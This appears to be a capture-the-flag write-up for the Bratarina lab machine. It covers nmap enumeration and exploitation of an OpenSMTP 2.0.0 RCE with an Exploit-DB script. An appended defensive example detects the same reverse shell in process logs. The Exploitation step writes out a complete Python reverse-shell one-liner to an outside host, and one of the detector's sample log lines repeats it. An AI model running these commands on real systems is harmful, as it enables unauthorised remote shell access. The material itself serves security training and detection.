  • Zeyu's OSCP Writeups
Bratarina

Writeup for Bratarina from Offensive Security Proving Grounds (PG)

Last updated 3 years ago

Service Enumeration

nmapAutomator.sh -H 192.168.163.71 -t full

nmapAutomator.sh -H 192.168.163.71 -t vulns

Samba

Null SMB sessions are allowed.

There is a backups share.

SMTP

OpenSMTP 2.0.0 is used.

Exploitation

python3 47984.py 192.168.163.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.163\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'

We receive a reverse shell:

Proof:

OpenSMTP 2.0.0 is affected by a remote code execution (RCE) vulnerability; the exploit used above (47984.py) is:

https://www.exploit-db.com/exploits/47984
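
From the defender's side, the reverse-shell one-liner passed to the exploit in the Exploitation step leaves a recognisable process command line: inline Python that opens a TCP connection, rebinds stdin/stdout to the socket and spawns a shell. The following is an added example, not part of the original writeup; the `pid=… user=… cmd=…` log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Traits of the one-liner in the Exploitation step, as they would appear in a
# process command line (quotes may or may not be backslash-escaped in the log).
INLINE_PY = re.compile(r"\bpython[0-9.]*\s+-c\b")
CONNECT = re.compile(r"\.connect\(\(\s*\\?[\"']([^\"'\\]+)\\?[\"']\s*,\s*(\d+)\s*\)\)")
DUP2 = re.compile(r"os\.dup2\([^,]+,\s*([012])\s*\)")
SHELL = re.compile(r"pty\.spawn\(|/bin/(?:ba)?sh\b")
LOG_LINE = re.compile(r"^pid=(\d+) user=(\S+) cmd=(.*)$")  # assumed log format

# Constructed sample process-log lines (not captured from the lab target).
SAMPLE_LINES = [
    r'pid=4101 user=root cmd=/usr/sbin/smbd --foreground --no-process-group',
    r'pid=4207 user=ops cmd=python3 -c import json,sys; print(json.load(sys.stdin)["version"])',
    r'pid=4250 user=ops cmd=python3 -c import socket; s=socket.socket(); s.connect(("192.0.2.53",53)); s.close()',
    r'pid=4312 user=root cmd=python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.0.2.10",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")',
]

def analyze(cmdline):
    """Return a finding for one command line, or None if it does not look like a reverse shell."""
    if not INLINE_PY.search(cmdline):
        return None
    conn = CONNECT.search(cmdline)
    fds = set(DUP2.findall(cmdline))
    hits = []
    if conn:
        hits.append("tcp_connect")
    if {"0", "1"} <= fds:              # stdin and stdout both rebound to one descriptor
        hits.append("stdio_redirect")
    if SHELL.search(cmdline):
        hits.append("shell_spawn")
    if len(hits) < 2:                  # a lone connect() or shell path is too common to alert on
        return None
    remote = (conn.group(1), int(conn.group(2))) if conn else None
    return {"indicators": hits, "remote": remote}

def scan(lines):
    """Return (pid, user, finding) for every log line that analyze() flags."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (finding := analyze(m.group(3))):
            findings.append((int(m.group(1)), m.group(2), finding))
    return findings

if __name__ == "__main__":
    for pid, user, finding in scan(SAMPLE_LINES):
        print(pid, user, finding)
```

Requiring two of the three traits keeps ordinary `python -c` usage, including scripts that only open a socket, out of the results.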